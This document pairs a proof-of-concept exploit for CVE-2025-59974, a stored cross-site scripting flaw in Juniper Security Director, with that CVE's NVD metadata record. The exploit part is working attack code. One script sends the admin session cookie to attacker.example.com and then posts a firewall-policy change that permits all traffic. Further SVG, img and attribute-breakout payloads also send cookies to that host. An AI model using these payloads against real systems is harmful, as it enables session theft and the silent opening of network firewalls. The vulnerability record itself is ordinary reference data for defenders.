CVE-2025-59974

<!-- CVE-2025-59974 - Juniper Security Director Stored XSS PoC Vulnerability: Improper Neutralization of Input During Web Page Generation Attack Type: Stored XSS (requires high privilege PR:H + user interaction UI:R) --> <!-- Step 1: Attacker (authenticated high-privilege user) injects malicious payload into a vulnerable input field --> <!-- Example: Injecting payload via a policy description or device label field --> <script> // Exfiltrate admin session cookie to attacker-controlled server var img = new Image(); img.src = "https://attacker.example.com/steal?cookie=" + encodeURIComponent(document.cookie); // Perform privileged actions on behalf of the victim (e.g., modify firewall policy) var xhr = new XMLHttpRequest(); xhr.open("POST", "/api/junos/space/security-management/firewall-policy/modify", true); xhr.setRequestHeader("Content-Type", "application/json"); xhr.withCredentials = true; xhr.send(JSON.stringify({ "policyId": "target-policy-id", "action": "permit", "sourceAddress": "any", "destinationAddress": "any", "comment": "Compromised by CVE-2025-59974" })); </script> <!-- Step 2: Victim (e.g., admin) views the affected page containing the stored payload --> <!-- The malicious script executes in the victim's browser context automatically --> <!-- Alternative payloads for different injection contexts --> <!-- HTML attribute context: --> " onmouseover="alert(document.domain)" autofocus="" <!-- SVG-based payload (bypasses some filters): --> <svg/onload=fetch('https://attacker.example.com/log?data='+document.cookie)> <!-- Event handler in img tag: --> <img src=x onerror="var i=new Image();i.src='https://attacker.example.com/x?'+document.cookie;">

{"cve": {"id": "CVE-2025-59974", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.993", "lastModified": "2026-01-23T19:59:02.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Junos Space Security Director allows an attacker to inject malicious scripts into the application, which are then stored and executed in the context of other users' browsers when they access affected pages.This issue affects Juniper Security Director: \n\n * All versions before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "089ADA2B-78A6-46F2-9560-B4EC849D394F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "DBDC52A5-EE95-40D7-870C-56AF400E0531"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "3C05DBD6-F4E6-4748-BBC9-CB0DF6ED3541"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "B866E017-3B4A-4779-A736-5D68E544E93F"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103139", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}